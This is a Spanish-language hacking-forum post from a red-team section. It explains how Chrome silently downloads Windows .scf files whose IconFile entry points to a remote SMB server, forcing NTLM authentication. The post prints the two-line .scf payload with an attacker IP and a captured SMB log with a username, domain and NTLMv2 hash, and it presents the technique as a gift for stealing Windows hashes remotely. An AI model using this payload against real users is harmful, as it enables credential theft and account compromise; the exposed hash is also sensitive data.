Bienvenidos al nuevo foro de hackplayers. En caso de encontrarse cualquier tipo de error, contacte con cualquier administrador por mensaje privado.
Recuerda que, para incrementar tu privacidad, tambien puedes acceder al foro usando el dominio forohpysho2t5mjs.onion de la red tor.

Robando hashses de windows gracias al navegador y en remoto!!

SuperFumeSuperFume
en Pentesting (Red Team) Vote Up1Vote Down
A los wenos días familia, hoy venia todo subido xq había visto por ahí el tema de los subtítulos y digo ya veras, lo van a flipar en el foro con esta mandanguita... xo al llegar veo que ya hay un post al respecto y eso es cojonudo xq quiere decir que hackplayers esta ahí en la vanguardia, mis dieses....

Bueno a lo que voy, hoy vengo con regalitos también para los coleguitas, bien, resulta que nuestros amigos los navegadores en concreto chrome, cuando un tipo de archivo es "confiable" se descarga sin mostrarnos el cuadro de dialogo tipico y se lo descarga en la ruta en la que esté.

Bueno ¿qué pasaría si existiese un tipo de archivo que se descargase y nos permitiese realizar acciones "maliciosas" sin interacción del usuario? pues fuck yea existen y son los olvidados Windows Explorer Shell Command File (.scf), este tipo de archivo por lo visto utilizados desde win98, es un tipo de archivo de texto que contiene un comando para ser ejecutado y su respectivo icono..., mmmmm icono eh? Os suena la vulnerabilidad usada por stuxnet que utilizaba un acceso directo que especificaba en la ruta al icono una dirección remota y eso forzaba a güindows a autentificarse frente al servidor identificado?
Pues esto es la misma mierda, basicamente si tu te curras un archivo .scf que contenga algo asi:

[Shell]
IconFile=\\170.170.170.170\icon

que pasa cuando se descarga sin preguntar xq chrome se fia de este tipo de archivos que se produce una autentificacion contra el servidor remoto dejandonos unos hashes mu rikines de regalo:

[*] SMB Captured - 2017-05-15 13:10:44 +0200
NTLMv2 Response Captured from 173.203.29.182:62521 - 173.203.29.182
USER:Bosko DOMAIN:Master OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:98daf39c3a253bbe4a289e7a746d4b24 NT_CLIENT_CHALLENGE:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e0000000002000000000000 0000000000
Bosko::Master:1122334455667788:98daf39c3a253bbe4a289e7a746d4b24:01010000000000000e5f83e06f cdd201ccf26d91cd9e326e00000000020000000000000000000000


Bueno os kedo el link (hoy no se me olvida romam ;) ) --> https://www.helpnetsecurity.com/2017/05/15/stealing-windows-credentials-using-google-chrome/


Que aproveche! y recuerden

Instrúyanse, porque tendremos necesidad de toda vuestra inteligencia.

 Agítense, porque tendremos necesidad de todo vuestro entusiasmo. 

Organícense, porque tendremos necesidad de toda vuestra fuerza.


 
Etiquetado:

Comentarios

Accede o Regístrate para comentar.